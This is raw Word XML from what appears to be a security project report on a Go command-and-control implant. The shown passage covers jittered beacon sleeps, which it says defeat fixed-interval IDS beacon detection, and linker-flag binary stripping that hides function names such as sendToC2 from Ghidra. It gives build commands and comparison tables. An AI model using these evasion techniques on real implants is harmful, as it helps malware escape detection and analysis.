              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D31D4C9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BBCED59" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Usage: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>jitteredSleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(60*</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>time.Second</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, 20)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49EA505D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// Result: sleeps between 48s and 72s — breaks beacon detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="250C11CC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0607EBE8" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc226583764"/>
    </w:p>
    <w:p w14:paraId="25ECF91B" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07022A3F" wp14:editId="00F5A70E">
            <wp:extent cx="5734050" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="55969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2924175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA2080" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E11207" w14:textId="6A8488C7" w:rsidR="00A44941" w:rsidRDefault="00A44941" w:rsidP="00A44941">
      <w:r>
        <w:t>Figure X — Wireshark capture of 21 consecutive beacons from v5_jitter.exe. The Time column shows the inter-arrival intervals varying between 49.3 seconds and 72.7 seconds, with an average of 59.3 seconds over the capture period. The 23.4 second spread across 21 samples confirms the jitter function is producing genuine randomisation within the expected ±20% window. A network IDS beacon detector configured for a fixed 60-second interval would not trigger on this traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042E25C" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4A8E61" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422B1965" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05841CAA" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62789671" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27664D97" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D44D8F" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003A1F05" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269D80E5" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11216D18" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B441AB" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68384671" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7BD8BE" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D893320" w14:textId="77777777" w:rsidR="00A44941" w:rsidRDefault="00A44941">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1727D340" w14:textId="1336EF5B" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3  Binary Stripping — Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="6DDFF120" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Binary stripping is applied entirely at compile time through two linker flags passed to the Go build command. The source code of v5_jitter.go is unchanged — only the build command differs. The flags instruct the Go linker to omit the symbol table and DWARF debugging tables from the compiled binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43323F47" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>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1626"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C0DF0" w14:paraId="550B9F18" w14:textId="7777777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B25AEF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>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57825A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>What It Removes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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309688" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Effect on Runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6C89485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344B2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-s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F267F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Symbol table — all function names, variable names, and package import paths used by debuggers and disassemblers</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4BB11" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0E3F8F7F"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981FB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-w</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EC5992" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DWARF debug information — source file paths, line numbers, and type information used by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and dlv</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34F248" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0049A84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0BEB9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-s -w combined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192E6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Both sections together — maximum analyst visibility reduction and maximum binary size reduction</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D7DA4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24C8E836" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4A81193D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="55B2152C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc226583765"/>
      <w:r>
        <w:t>Build Commands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0DF0" w14:paraId="41A676B4" w14:textId="77777777">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2BE314EC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Binary Stripping Build Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3FBD539F"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A24B07B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Standard build — function names visible in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (~1.8 MB)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C933766" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GOOS=windows GOARCH=amd64 go build -o v5_jitter.exe v5_jitter.go</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C1204B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A00A7BA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Stripped build — no function names, no source paths (~1.2 MB, ~33% smaller)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562F532D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GOOS=windows GOARCH=amd64 go build -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ldflags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>="-s -w" -o v5_final.exe v5_jitter.go</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7096BF8F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="623FC576" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Verify stripping worked — both searches should return no output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43872B17" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">strings.exe v5_final.exe | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>findstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> "http"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338CE86C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">strings.exe v5_final.exe | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>findstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> "main.sendToC2"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D3DD32D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="27DB4C13" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="23024FDE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc226583766"/>
      <w:r>
        <w:t xml:space="preserve">Before and After — What </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Sees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2C0DF0" w14:paraId="0D11A86E"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BEBEC2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">What </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Shows</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A8DA69" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unstripped (v5_jitter.exe)</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CFE85A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stripped (v5_final.exe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3B11C8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72E5E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Function names in Symbol Tree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AC501" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>main.main</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, main.sendToC2, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>main.decode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>main.jitteredSleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — all readable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4B71E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FUN_00401a20, FUN_00403b10 — generic auto-named only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1771A8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A1F40" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source file paths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DA21B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full build path visible in strings — exposes operator username and directory</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0C711" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Removed — no build path exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="76BE09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D8762" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Line number info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FADEA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Present — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> maps each instruction to source line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FD8D4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Removed — no source correlation possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="110F59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A3882" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Binary size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6B9A8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>~1.8 MB</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D2131" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>~1.2 MB — approximately 33% reduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="19D9BC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1F10A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Runtime behaviour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8D684" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Identical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A3D2C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Identical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="511488C6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1BCFF4E4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
